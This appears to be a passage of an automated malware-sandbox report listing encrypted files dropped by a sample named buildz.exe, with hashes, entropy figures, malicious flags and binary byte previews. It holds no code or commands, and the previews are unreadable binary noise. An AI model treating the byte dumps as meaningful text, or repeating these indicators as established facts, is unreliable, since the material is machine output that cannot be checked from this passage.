                        SHA-512:62123B2908847158622DE33906447BEC0FB542160BF8237046B15604081326C8BC0E772448068650C5468348EF025B41F1CF8D2CC5D52C76505E3255F8FF7255
                        Malicious:false
                        Preview:.......M..T.\Mr....a.)@.......+N.%.B...}..].J....b.....$.T...k....)D.g.B.Q.Q'.OiLje;%..X.;.*#...2...a.U. Cv...Sd.j.......+T......W5....-...tz:I.]?J..ZxrHun....i.s.S) ).....W....Y..C..{.].)..Y9,.g@.g.....^z.. ..J5L.C.q~'-.H.lE\...WW.J'k..k}_op.....V...H.-......B.wOJ-t.x.\.D.oh..:H..f&|:ZN/....|..=.].......Z.t.l....)..*....Z....u.9YE..v......[..H.]I.&...FfK.2.b...v.:.Q(...u...........=.....y.yu.>....a..T...M2W..p.....("...0.7/5+.e.....E.S.F.u.V..L.U....km"..W.%...h!.....!b..ju@Rv..N....V.uQa....JY.)}.v.cP00V2#......5.xy|p...Y..........I....V.n...%.q..a.3.@.y.7......E...i....jU.QK.';N.M.....2"%n......T..K..l@5!...&.H^,HM.u.N.......(...}.p.'u....8N6....L...l...=...}g.....J..y.V=g{..|..A..'..jS..64W@.CvV+8..H...w.p).u....p`....P.......~m.....`."..,...Q#....x......D.sd.c...3D.i......-gO..r.}.C".....~.fCc.....Q!.@.gz..@.......H..?.S.+...bz-..ng......G..8...MR.(.V.....G.+k.."lyp.:.r....]..._.).g..J..'..l....0.G.B.j.8e-......k.k...7.f
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):524622
                        Entropy (8bit):3.2077776120563986
                        Encrypted:false
                        SSDEEP:3072:Dcs23/cn7v6Cwp5Ke9hBXTZk3vfX6vLbUzrBF3f5gEQhPEdXi7uCA:Dx23/cnT6CwPth5TZAvf20v3f5gPPC
                        MD5:855471F45FC9286C6F7F4C681BABAD12
                        SHA1:D9E8CF4CCC61406ACB15B5CA05C807DCD0BA168F
                        SHA-256:06988570C153C86D13BF577DF5EA3E1C29A3935550C4AC05831AD5D00B6AC3E1
                        SHA-512:E974E60FC73323EE87C63F9E5069A5E28E458C3BF214ED57654A621D8232FF29F5A8D08F51D496B82EFC673847EFA591E790B481844FB3DE010E658593BE333C
                        Malicious:false
                        Preview:.....\.........T..\..4...../......\.%....k~+B.Mx.r..J.".*d...U.x...........$..+...x4d......M.[A....KbQm...z.JA....[."......D..o..7X.^.1....}V...Aw_>@.~o....-...i....y6..~'.R..w.4..r..z..w.Vd..Z[...Z.}R..#M...J.Ib."y/?.mv...K.|...(..F.L."....v.q.x.EK.M...k......H...$....4.N..."..Lh.=.... . 3{......?....E.E.y.,.....s.....J{./.....ag4Q.m.e.+.......".....M..`.4a..m....p..$..R.^s.).g.8..^f.7txbu...,`...k.t.<..m.}...#.....{.t#).....@2..:..1 .Z.G6.....6....yH.q..x.-.T.Y,.%......N..#.h.$....-........z......2$..`..?...|h.92..._@k.Go.Cy....[.7M..$.Z.t/H.|..M.8Q....uE.e.L;....q{.p.{.N.Z...o........a..K>.Q....1@Q^-.DxF.T....B.......Ll..&.Q......1.2..el4...,..Lj...-H..q..&...%.:..q...P5b...CV..CR.t.j..9.]V.U..0.6........".s".[....x.3.v...y,..f.J"A.K>...;+@O.Zaku.Nx.cc;..i.{:.a.......|.WBs.~..9'....v.$..hY+.l ^P.2...7q...B.....{...._..S=..{.F.^..*4#t@.-..^.H.0&.t.....W....W....0..w..NQ.0`c..pL...l...K.-C.Rc...\.....G.G.;T..]~A..'....F!...KA... .{..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):101855
                        Entropy (8bit):7.998064159524294
                        Encrypted:true
                        SSDEEP:3072:uiqmdnVLe6WlWREvD0jf11ElI4X2K5e+5BvA:TVwl0jf+I+2K5j4
                        MD5:9A895A6E900B3EFE2A44608B7D7903BA
                        SHA1:EEE089B7EABCCBC017D2D5F6667C3C7EC8084A6D
                        SHA-256:F4C347BD5E9879B8289908378E12BC87EF255D3BB375A54E613292573F779162
                        SHA-512:DBA4D1425FEAD20377EF2A29704D25CDD75A72833173566E4C180DE6330FFEFF87245A39C281A95ADEB8F969E4911A70AA2FCC1E26A97551766E0B8B5DEF7493
                        Malicious:true
                        Preview:[{"Sy..[..I1(.2._....].JM...G._}..F....>..s.....}....9..................:`..,...T.'...]..+.Ip.0[..R...op..v.@........W....74h*..U.3$...k2.{>.hm...-.Hx~..v.nd8.......l...0.....X.6.g.DN.g..+..KU...F.+..|.m......`..m.....m..5xq..nk4...d..>....Cj..['m<..$X~..)p.f...#.h..CZ.o....?.U..Nb..L/,.Jn2Z0x...R.t..z...*.PD.`.........F1=....;..~.;....}.K.,q&1.E..(m?=p".q.2...... ...]r..9..fRg!*|.s|...X"....Mr.3.u.ON~.....n....q?.+iy....A*4!.P...pU....Jd-8.$.R[.a......zB./.."su.bP.uo1.<.l.L}...ErR{..I.\<KE...{.]......,..f6..ap<!tU.....g.*..?@N.Tl.$. XZM. ;...\V..@..<.X.b.u.m.d..{..w..6p.._....`.....GBQ<kz:lx....T.DRX..z+.N..K.j./.......V..mjke..J..Q}..Bg5...b...t...!.oa.%..`4.r..s.....y.\..gJ..K....'.....=;Q.....?.....7P..-.y..a...T......d.......mr..I..x...T\.}9%.2....X.c....X.T....*..k.].......Fw...:...].:....].{...E........\..e...r.ZU|..D...m...KN.]Y...PFT<&.m!Cb$.Xs.I.1*..qP...8..:..'"Q.\O_.M.v[r.e.AJU........Q$f..3....+..g.. ..v.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104130
                        Entropy (8bit):7.99818292100947
                        Encrypted:true
                        SSDEEP:1536:8SBSVJ61EiXLkApzyi2nh4NMYEoYp/XKpy7nkISIIvCaHSEq303lQqDAFJ2T5A:82JyixREdpXKp6kIwKwO01H8FE9A
                        MD5:A2EF329BEFE0C83684C025B3260A8A7F
                        SHA1:0D3E594B3DF8C65484006F5EEC660B5DA3DCB862
                        SHA-256:9045801517BBD72CE5D02A6CE894EA4FDD2157BE6426431B1E34D90B6B723272
                        SHA-512:E1EF69F17846BE9A36B17A6149AE6DDA4E6E6ECE8D6DA11A5F13A58205C60E775ACC508B7FD42D8DBBD0B1679EC7F0FBD828A0D439A70E53E5F6867F3DF5A48F
                        Malicious:true
                        Preview:[{"Sy..)HZ.l..{6..L.|.....=E.A.E..-.y~...5.....*./..X.."..........\Pq.....v..(..._m.bSle..dI.......`.....}.S|.\gq..B...S@>3.3..g....=...v.........exWU...>.i..7.|.~......F..s..<atD.m..e..9....+fN..8\favJ7......*_.0..e.c..I..BtV.2.. .h..}s.6..VC.9\....dj}.....y..Iri.>5. ..1F..'.....2..J.....&....Az.. ...........y".o..da\.x.W..)[..N.2....tY...;.>U=.U...:?P...b.J...<.xA.?....m..h.r...W...2........u.^4..X3..#..6...>.p1.V.....QM7.7...Ln+.N.....{?...s.{%.....>...F..Y%.<.CgP`U....'.B...y6*..-P@..8.....{...5...z.q......Sz..x3m`.....<..#.Z...1..q`.....-$!;|.Y....~.ye...F.Tx....]..9.~..UmJ............../.ub.4.,.0...t..xx...<.4-9`....|.[..}..........T...>dI.?3.......N.(..QM..!N..{...h%....F...t.`.i...&.1C.....s..0...)]...t....;.y.y...09n.....-I.......q.S.<R&...b..0@-..QC.K.....4\T...I..*q..a"f....q.PE.....9m.DA.,9.;.4.s.s...Q3.z...h. ...$'y.....Ncg9H.>...H.......F-.$......I....c].]DF..B...:..X.:..._.5.f.....a[J.c.V.../gb#.....+...g..b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104148
                        Entropy (8bit):7.99822041743778
                        Encrypted:true
                        SSDEEP:3072:8tYn5JQMcepRmLBsi2qW60nz+RyWRh89gioA:8tYn5JQMcIQL7zWv+RPRE
                        MD5:B0A8B1B6C312BAFF02F10225E09B0104
                        SHA1:2EEF74CE20F2818B3F9EB8BB32D8D55A099C4F88
                        SHA-256:1AE3CF12828B6E90F03A28A7D6C2CCDE01A703F709F316F5BAA63713ECC083C8
                        SHA-512:A68678D003093665D42E3B149319A970777A93AC2157B0C4484E382FDE4FD05172B93AE72787DB52F24F39A03F78F3E567983BA00154D519106F7799789D62AA
                        Malicious:true
                        Preview:[{"Sy..h/}O.0...}.PT....u7L:.V.K..o.|O..ss.Lks'....D......_..xD.....6%.,...Tia.....w{.S.......J.<F%d...B.`d..Ks\.W#.Eb....X..u.Em.W....$....l.....d.n....+..V.*......4c.v..|......#.H.U.....F.R....M|5.....d...1.{+.{.q....T..GG@......Y1i..".Bj...W.y"...|X.ngRDC....m...R.i'..3..i&.r...JhN%.%F..)P.....N4....'.HD.......#.n.l.2yx....$.n2...6>J..)t.g..[.....^>0..}.{.....gW(....v.L.hJ..w...\N.... 8...b...8..lv.g.....k.n........(9.."R..........^<..m*..v.....,z..|.f......:O.8.?-F2.kj.e.)..!..X.s..0..y...g.!.....!.X....u!..[d!....~..E..8...+.+A..u5.].F....d".W?b.|9..!...E....;....m=~.......V8.3....Ag*s.^..cs.....Cr.w....s.- .....(\1"My..b...R.(I..c.M'.....&....W."k.1....?!_@...{..'...TZ....>..w..."c.W`..lp.[.J...If...f..p..q.4...O.D.!..C.m.k.......h...p..i.."..w...9..>.Yf..#.D.....w.ZY.%...J.a..Md..g\.JNO..)...1.)BU..y4b6r!:....Hx.o.W}..o..H.<..)...........>\...Y.[]....S.....Q.......i<:..hH`3.l..{I.. ....{.5+...y..._....)u/t..V.".Xj..1tV).J.D6.... ....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104184
                        Entropy (8bit):7.998153538976193
                        Encrypted:true
                        SSDEEP:1536:/QECSqi+1eHdtzcgNTL4FLNc2vGeSy+D65smN8WyvjhXHjqLnQ6cCli4FMhYaSiA:/e7iNtzlNTyMonhubhXHWLnQOli9NfA
                        MD5:FDB233D5BE1FC0F6795F3682AF933EBA
                        SHA1:9C5D68353109B1E08116CB06561AEC88A0666110
                        SHA-256:957D851A207AE2CC09FBE56207CAABC0D9857BB5038402FEB15FA288ADC7B17E
                        SHA-512:8A4A1711A262965F98286848B87DC759E59841A03AE5F2F6B4EDB61E6CCA226B0D7EC3C41189A7FD8C2F7E1CD603FD1D814F576446FA1F1110DA8C7C986AC17B
                        Malicious:true
                        Preview:[{"Sy.J..{]..M.b....%2.......L.d..,!.......v.6...zZ..1v<.:N..1i.(j'(q.....8/...%S..+...q..+..7.L...m..[.&..Ylvo...vo.U+.....(.....kR>E.oSv|..aE.....y..*....E....pW.u,..'.3....eb.36I...$0.G{.....*.~_`>.oy...D.y...!.....,..].>fj.+Ph.O..uwV....e[....s......H.0..).2..[F...D."R.t7..n.G.QD.,M./.C_$z....G}.O[.".M..3^.......e{.......\.#.)....w...v .2%..Y.....)}~..)O...PS+."F.c..;.P.*.m....L...P...".....JY.....)I......eH.8O..d2.NS ./.x...d[.|..q.X.2rKB8.PcV.fw.b...L..E,._..Hf..].r.....x`.b.(.!,.X.v.d...+..G.........FS3_`...j....=.<`..tH..5.sGW....~....a!q<...A9.R...i..K.*..R.../E..........nt.r.6...h.......G X..j.u.. U.e'j]U..)...Z^X...5...G.e-....v.X....c..%^....9?.'...R....s:=$..(.j.....,wi...'.TK.Y...*..'.....8.sp.....#....~..q[. .Q.r.?~a...I...p...Pc_.Hz.C.P.zs......z.q.OL......@.mQ.J.....A.S..x..B/.&D5e..?.J..f8./6'....!....$.Ag{..P0...a.RL..ay..v.p...n.H....V....05R...v,...Q.4x.yYb`>U.,..4./l..(..n.$..>...~y...K..6..=#..."..?.#-.fa(z.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104202
                        Entropy (8bit):7.998242459484254
                        Encrypted:true
                        SSDEEP:3072:or3mwT6UG8uALd3u/r5mzB/qur6eo2+WA:2z6XALd3u/VMhqm6ey/
                        MD5:12CAA170A7319CD588616D5F43AC2D8A
                        SHA1:112C8175979BE4624A91E2FB6BBEB1573446E499
                        SHA-256:B4B92219DDE00A8D900ABBA34231412DA00F81059ADD665CC85D9D1E548225BA
                        SHA-512:D4BD152ED87C0642FA276DDE687CAB72F937968609C1EA065FE134CCA1430AE8691301143AB31E0BBF8044D9328E01A6BE570556871FD34D32559F0477904C5C
                        Malicious:true
                        Preview:[{"Sy;.B..N.G......).....g.:.Z?....:>..p..$%.r.>?.....s2...H..W..5..L72R.......q...a.......:.....Q+&,..8...#!..".....<`.8.+"..m.....(B.t.+R...I.....w......;Ar...g|..p`H....Uwz...?....].S...k.k8...=........0..&|2..1...a...]x.S|.....=.(2~.If.?s....s0..^~\..=...y.sM4h....j.|Gq......,...A.t..D\...]..`..~{<ers..a.$j..&#,....BKe.{..E.8`3...x.lX.HT.wTz...A..b.O....*0...J./.)..a.! C......dE.5.U..8.g.m..j..b|..|.@al........_.MP..9.L..30...."...Z..OB...d...ho.....|..C....b.y........A....V..].\p..S)...K.....\...w........=.R~<UM.6.}..z.%...5jx...._....P..Q..A..y.lN...r..2.y.G.?...&.W...*9..p..~.}.V.^h......#(}(....ff.=K...o.5.k..7.....1.WZ.^.a.....}C.s.g.9;U..,...i.......E.._M..J.!3.<.Cy..a...RY;.).Yxl...Y%..Fsl.K/....]p...8.~.kX...aTk...M.Ab.....+...//.........S........g....f.....G.P3.h......A.ss....P.....Y...S..2.3cMj!uc...6....n=Y.w..l....f....TF.m...]poD...Q.nG.u....Z.......0.n._.|.,.Jr`....Zq\c.rg...]`...-v|..../.M\.p>.'....{-.m{J(
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):104646
                        Entropy (8bit):7.9984435327968
                        Encrypted:true
                        SSDEEP:3072:/b7jRcDjVeHMAiNKHAypaxTjRGiKX79ZjjhA:PjRajfAiNCA1vRyX79Zu
                        MD5:707792A4DC26BFFD4645980A97043C62
                        SHA1:8ED082464E7AF5DA48DA8099067EE1854EADDB1A
                        SHA-256:9526B86B3714A28237D0FC361AB326B7CAB62B67FBB43BAE7321F266A3BB5E98
                        SHA-512:CD9A4A6C29FA3F72FFBB52124F8BFA3A89B3F163BC611392FE9E7C7D6A1EBB9426F53C0B8BDE4D075F760B5416ED75F8239889A67C0091E5CCD2BA209E3D62EA
                        Malicious:true
                        Preview:[{"SyrM...........g#..............?....A.....f...T..@#.ccp...}g....{;...JLV..^.SH...(...Q...........r..WTie...|.?.SF....1..V....S...+..,..#........05..X8e.Km..+.GY..nm..]r..^...w....0`.1..Vi..vN...'....x..I ...8.;.c...ef3UWL9.F/r..)...l?..|..e..`...U.HD..A..$..O..33,..L*.r.y#....$......X.1.6....+......9.....N.K.yPt..ioP..SI....=x2.+~.>...f...c.b~..d..#r(.5.CfT.(lm.0.G..s.E6......U.C.5.9*.x..h-.\kCf}n.y...........p.*....D.y.Zm(..q...^s..2.Z.bI./....H..^Ln..(w.B..I.D...K\4~ky..4U.M}..'..\q/.I......bP@.....P...S3....o..@...B. n.._ _a..o..-]..AS..3.R..........I...q..9..7........3.l.t5........P.w.y.^Y.l.@...I\....6..rGi9.../..J......i.7..>.J.L]?G^.V.....q.......3(..A)...H..8PF.8...Cb...O...JI..fX.X..~..n)...`. S..u9..(...t.;.M]...R,....J.QK....e.\.O}.:(A7.|...&.B.}.3bX..;s.....;..'R..<dYw.+......{ ..Pw..35..0(.Yg..-....0..6.|b.K.......0.=.k?..B>.2.6..E..."..2N.+w.*....{O.fn....~.e....^2-..d.&.S...u..r*...B>)........./m.......Kn...i..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105788
                        Entropy (8bit):7.998241574189697
                        Encrypted:true
                        SSDEEP:1536:/+m198O917K/DgnCrSyxfrfgUfRuBNXvAmxTakHG2OkoIypc95QQBf5Y2A:/vrB7IDoqDgUfaYmZNMIyGwQvA
                        MD5:07467BB244795DA6918C3C8EAC18506C
                        SHA1:8215446B0A7EBD7A4E3F7F8437DA2E5859A2AE14
                        SHA-256:5EBEF07B6DD8BD2DC609B03C9EFE82D0D7B6FDF5F5C72E256AF6691E393C27D4
                        SHA-512:4465B72403428AB872BC31E8DE85FBBB06A711C16386D097850C9246E7B942FADE54BF1C5C16A665EEEF74587097B0190A45D4FC0FDB2D66C12C5D96DE04E92A
                        Malicious:true
                        Preview:[{"Sy..2R..f..h..UW..._...0..u.|.w..q$....4.|CUZr.T[...b..dU...L...O....(.t8.../..r2c..-B].m..B..<=.Q.C1..D. ...t...uD65=s.r.8.h.+.....y......ST..f......n)j.............D./.....:..zk.7....f..m-3.:Gn0.bK.[..z.v.x3..........r3...!^.T$.N....p@........3)......U.s......XuKP...L.k...).X.[M|.j.:.Dq..K/.{.0{K...G.%.\.].~^....<.b.!..w..F[S..;...1.G...:...N.E|....;..~.......t....@z..F..AO..e.1|.`.i.t......!l......uI.=......pZ...'.W!:........b..n.E?.R.M..H..V_....w]pK..m..C......4oj.=......IC...y.=T.[\,2.@........X...nh..M...+..)fW.8OlzI.8...e...SEF...A..$?...p....Xj.xB.u......0[.......$..C.^@..F.D"..t.n.'..o..\...A?T.Q;B...n/.}[}..[...K......f.>..H.#..P.e...7...d1%..X,.$_K.7.}.>2..Rh...Z...1...."..hs .._.k..:..A3..E....O.6.S[....K/...JPB..?...)9..=./......e..H.3.n.OH0E.|8..!......#b:.p.M.X........2..`.2)y...oD0UW.P`U=z....j.t..X..1|...S..c.^.-."V..V..q7K.N..X.H..~...|.......2...i=y.m...w.....?`..2..pp...:I._-r!.v..].AU.(.9\..L..c.I
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105788
                        Entropy (8bit):7.998298934650054
                        Encrypted:true
                        SSDEEP:1536:f++agnAbQ9MH37DvVq3ndJBo26xC4PuvtS86j778xO3HcqDno0XWKA:mtgA1H3VMRN6xTYIhj7oE3pro05A
                        MD5:4E3294A3B907AA6B6FE151A754FEFD33
                        SHA1:28543038F4D6642B62D643C701C5F7329DB191FD
                        SHA-256:409DD088BDF371EE8D3C9DD8317EB1A6CEB32DBE0DCFD0A7F15BCD4E2E97D03F
                        SHA-512:5EBD573A916674D6FCCEB71CB797E9CC8302645C26E6A539823E5D97C9BD581414425F51DBDD329C1E7811EE53B9DA5324C83499CB979EC1D756D6FBAA26AD6F
                        Malicious:true
                        Preview:[{"Sy...n..uQ~d...]....N....}!/E.......@d.* M...X.5.T.9..[.4....e..[....H$.pN.....$.L......4s.>e..R....K.!.H..0..eLEa....C...T..Ra.r/Cm..lT. 8..3P..#h.5kH$bD...R........wZ.P..6..THE6..#...3.[. Y.....D6..q....apU..8...$.(Q.M.`........._.7..x3I.i.$...).... ........%}H.?.D...j]s.1.`..=4\.l.6B.jUP...@..'`R.r....I.|p."...."l.M...d..O......y#z...-..8R..VT.dE.x.A8eMBB0.....xP....Y.T..........?rh....<..-..ym.y..A................x..BiQ.\.y..q2.........../k:...b..E..).d.f....o...UE.....L.yp... .i.../y..r.....;g...%&...l...7M..~BP...d...H.....6.:.......P.. ....,...4...j......T...y9'.[.G.1....=..|Taio.....e..h.KRM}.y..g..U%.a5.....`n.....H<-........(....7.g...l..B}..DG~.#.V..._...........(...s...."$.qq...!.....h7.k...Z..I/r.-..*(L.k.Mx*.OS.A:.%.o.....; ..........13a..1Uq.K.~.,.....u...p...L.G.........R.0....1pq<...7...$.#...P;....c..Y`.u......D...O........{`...y....[..^..E.u.q..d.....J.....+.....=..6P....+...@.]nS..r~......M.W.....D..Y5.e.M.rG..q..@......A....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105788
                        Entropy (8bit):7.998215494884458
                        Encrypted:true
                        SSDEEP:1536:l4GLzkyU9VzB9A0wJgwX+UbtBI/TlhfYXYKGcZlOZkVdJ60RchvOZFOdA:yGXilxuZrI7lEYl+wZqJRcROHYA
                        MD5:F0FEE5DE8AC1DBCD4D582BA3099957EC
                        SHA1:DCDADA81181FC9249B384FAE9B373D4F068DA632
                        SHA-256:FBFC9271E7DDBF3AB81455E8B08ED35B214C146BE35530F9DFC9E52CA54C77EF
                        SHA-512:B9B64548ADFF0AE5E7FE24A629F1FDE2D79F9D5B276359304C95D234952DAA9653DBE2D06843CC67B619DB2B087A842C13C4A7137D2F67357EB00BEFA9A57DF9
                        Malicious:true
                        Preview:[{"Syq....t..?..\.....b..WU/t_..~.c......c..S...I~BK..g....DX....d......9U7=..L_....@...>.......#...+..j.*8.A7....H.A..].<..~....5.)....}^=.c.e.*4.k.....2`h..?.:....@-......c38e......]....r.. I..;..5...~h_.M.[.|..qf......`.ML...s.{.'z.=......n...V.o....>.....pZ.......~......p.aD..LB..}.aX..+....R..s.<sE...=.-..sA..m!G....m.N.|u~l.k....C......p.CP&.d.|... ._..&.2|0d!.9?.m.....y!..V...}@NH.H$&....U&.H.Pro...Hqy.YQ5..3.g!1...P...5......dN..:..,...!.+,?*5..i.......Y3.4.g..M..%...[..NuD-..5...4.Tv...9.Y.e.z..-....>_..Y..)..9....3.wWD.\....g..!##..l.4.|w.c.ix.u..b.?<n."......|p#TE....6.A.+..tZK8I....F....~.u....4.M.a.:.g_.:1D.....S%.....:\.AoB..,7/k....D.?.T..B|.....q...&...C.........2h&.0...X)..3X..M..X...2.d. ..l.._.+..f.H..2..\.x#*.{.`.&...3<|....3....D..#...ec.j..z.....h`w.E...t1WJ....v....JN3.."J.j_.2q.......7{..._]..........G.%s.......0.....R.../.o..."|...45Z..Iq..o.d..`6/M.4.d.s..vj..73"...s.....%.l,..X%o..P94V=k8.Ji....[.d.g..g.kSE...E..m.Z...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105788
                        Entropy (8bit):7.99832353006121
                        Encrypted:true
                        SSDEEP:1536:JMeWloT5U7RMMZiIywZf0RwFOktO6IZpml+htf4FvFFchu/j7lVKu/6TejTA:JzFNCWMZ9Zf0RSB0vhBaYQ/tCyjTA
                        MD5:89DF9C11CDB8ABA563C14486F9B3DF0E
                        SHA1:29A7070D7B5E17393BF4DB30ABDD7D5B4E8EA318
                        SHA-256:3380925B15DD02CBBC63455DDC852ED105E71BFFC32C19889E147CA1169E0F38
                        SHA-512:A944DC0F537888F676F52AD9E21AAE6568BB9777B5707BA39EE1062874F418A7137E46CDC2F9E784914DDA6FB323A130D0E523A479BD07B38F2B5EFB172B0976
                        Malicious:true
                        Preview:[{"Sy....\6...L.{U...f.a......A..O....8m...:L..6.k..{Z...P..H..J....&.<...t....5+.3.q..,.Ak.R.\...N.j.a.tT..}..U|Z...'(....J..s.....)....2s...D3.E\..@.|...k.".Vn....}Hk&.,...|ffsic..p..........}5....UnF....d.:.]...wPQ?..Q.,.....e..O.:..L.F...h.V......j..Gd.Y....r..By.zzku...&.^.G.=..~....q6.`S......A..B...a.%..m<..Ur.Nj.g.3+{.l.|....O<.l..p.Y...\.....1.z<.9zd._....M......1.6lq.@4..f=.d.{..`.t..'.i.un...%...}.,?.....d..l...L..d=@..;.....j=.....".@.|0.....9U..Z....x...H..F....._.C{.f.........".`\!:.p[..O..X....C..?..a@.......y=..C.R._-....[..=...2M.<Mt.|{.V...T.n..%...g5N..8].0c.g8;=..D..S,.HUiK...8..'....SfF&{...q.\Vl)nY..}...........[......3.n.N.5c.[...Ed..a...G>c9....Z...|.,.2.'a.k.}.R.<4.3.}..B,k......)z...w..C......9 O...{...t...6C).W........j...Y{..@.g.+.K...a....54T|_I......DQV.|....{o"sx.......9...z...6...ty.y.x..|."E....).y.I.Y.q.P.........gQ....QH#....|.......1:..5h.T".......X.1......|....#...f..w....(.l.;0...v&/5G0._}^a.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105914
                        Entropy (8bit):7.9984357025307276
                        Encrypted:true
                        SSDEEP:3072:S+ElMaFXvEZfXHa87aFpg+P6kDc8MiTzhC7e3A:S+ElpXMJHvafPxXMUdw
                        MD5:239712A425A9CB7731BA10BD4DC3D32B
                        SHA1:8FACCE6375F8C2EA8175D31D9E1E66EF8FCA19C4
                        SHA-256:8F032DEABDD10E193F11E8EA2321F18952285B30A5F9DED7A700E9A075B4B5CA
                        SHA-512:3D20A664030479CE4CFC06D66A03159E2209D0349214575F8307D79EAE4513E6FCD186B9526F5B8ADB2BC509D1140AB6E95081676D4D37FC50F79FE88E4EC08C
                        Malicious:true
                        Preview:[{"Syt../...c./."..xD....D..aB...I"`v8......("\*f:..j...J.I..5J.8%..f..O2..:....i.........-.P...{m..7..|..dGk-.|=..8.]n...NI..W.dmB....7&f...0.>.......Z..z.F.*0....BF...G@.0......a(6.....b..rE.!.g.)..a.7)~.T2....iE.Mo..}.M.Q..gA.0%.r....G.]c[Lh..~.l.;.....FD%S.].P..&{T.2.......^.....v.L@q..q......t0D.Q...)%..S].@..^...l.""k.G...7....@|.,.....b...F.=yEe.T.8.ua6...`{./.v2...?w/...-v....6.....V.st5...."1.J.3-c).T..~.k)-...Qd.h.#.QA%a..Q.P.%...p.pH.+..m.>u.m...*.y..p9.....sr.<L....x.w.jHb..F.#.6vmw.j...m'...G,/.j.J..[..]......s...s..L..nP.I.8n.`..|..6.aJ'..G.Z....;..e....Q..Pf.U(....u.-.M.".h..q..ND*k..{.be..#........`.$..;.u.`.,.-...Y.....i7...<..J...o.G.>.....h)..8.c..._'.f#fO....N....k8F......1..S.;..N...%v'.L.l.[...O..9...@../...G1..x..!*....K.......l9v.2!.-.G...........P.pjK~{.=.=#.P>....$p.....;..u.......a..Qw.|I]....'K...r.;.V..*-.`..*y...|.?....".w..Jk.x..j]:.6V.......>..t....6.p$...}..:.......U....&v.P.....O.......\J+.1E..44[..B
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118503
                        Entropy (8bit):7.998519218905113
                        Encrypted:true
                        SSDEEP:3072:x5mK6f3gKUyHqeTS8QGePsojZliiGmAqdnZRrGiuA:x5BWRUyH7QfHjDGXqdnbH
                        MD5:938901CC0626A42AB2E5CC40E54745F2
                        SHA1:84BEBFD015E4464005F965218BC996E53F4858E2
                        SHA-256:D2FC89CD87CA53BD3C18A9C2116A0DA594E4BF75A422E827F119F94AC0C7E066
                        SHA-512:1311F2CE1CD455CF251905E7A48AB773BD254AD4315FEA47F3DCCA4549C46904E697F8B0BC3CD525F9B1CBD9C1BEBCB1A15BE01686ED21EB23B96443C3CB57FA
                        Malicious:true
                        Preview:[{"Sy.;.5.2.....U.^L.l.......k.. ...O....R.Uk<."...yK%..K.2..........l.g..neO......c..n..x.|..Wc..jL.z..&.#.&..e.I.+<.J,K...:'?R.N.j$.TW].3.}..3l.gIX.....9.*....fl.(k.U..rG.&..<..fn~.Rd.X...q;....{f..M.X.U3Cb}....e.P.W.........+5._.SIX.....za.j.cg..{...*..%0a. mWw..<.(.j...B..p!.N...r...C....W~...F#9..sh.....Cl6...k.(r6p+.)...;ErE.....f.....a.c+y....+D......W..tj.......y2...JGxb...@m....s_..N.5..\6..K..J....J..I.......<IR}.....~..C.mz!?....G.....U.D.y.lIw.1.."..^Y.Y ..wA)pg.La.%.f..-3....+......MSGB9...O.G..)P....v......B.e...7'..(.7.T.c...t....p..}G...e....kf k...... ."..@..Dkd...`...*].n.Ym<.k....d.........Q..B......x.."Iu4...i..;-......s.24C.....z..i.'.....f.OG....9wh.~..G0.....5......0.?].^{Z@..C.'T....._..S?...C..z../.u\m......7J........Jpt....CJrd:8tX..I....h.}..R. ..OhO.|lR..)#.z....W....*q.)..|...o.-.Y#0)..A.,}.|....*?..<...9&/,h.o<.%..-.`.....1~.'..|..(`eg.?..q........Y.0(%.G...^^0.....3...v.`.....~....G......;K4../.1.....s....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118507
                        Entropy (8bit):7.998682297119293
                        Encrypted:true
                        SSDEEP:3072:3JA9Bo6EuPU8ON7P5KmVAYB1uMm4rnJWxhx3UdRj0SA:5aBo6FPOVxKq1u8rJkhx3UdR4j
                        MD5:3FEEE15A79D5CF7D4BDF95115833939B
                        SHA1:23584E18C32C2C190D4C34AD6D6494BB78F3090E
                        SHA-256:57902157581E073D112C38E4A262D1E2576FC2121BF4EDCFCD7EEF2D70A6689A
                        SHA-512:A9D2CCE69B1E4CAA094D4AE2752798206881644C8F9E35494BC60FE23DB6427962B06287E25D3A6DA502FCA6993E9AC70015493891EB568C6722A265553963D0
                        Malicious:true
                        Preview:[{"Sy......o...0p....`rxpg..t.......S~....wiW^......W..W.B.4Ae.....%..}{..k..x9.z%...K.v.A.>..c.g~~..]........ZX'.Fi53p`D,!x..= ..04>....c..|(b...j.O...=.St..g....t..L......-(*..C..)9.h.....j..10~q,....z#...M.J..Q2..8e....k..u>.B......zR.*....k.x.CaU.F.[.U...6.3....l..Qi..zI.3.....m..q..x........c8.{....$...i..q...t.O.r<.z..G?.B~.)....F.p....va.g.0.s.....Z.C.j.6.j.D5M....'..1.B...r....ZW.v....".c..=..YK1..t........6iJa.5.j.j..~...}.......\]...8.l...?...qJ..(|Z......6.. 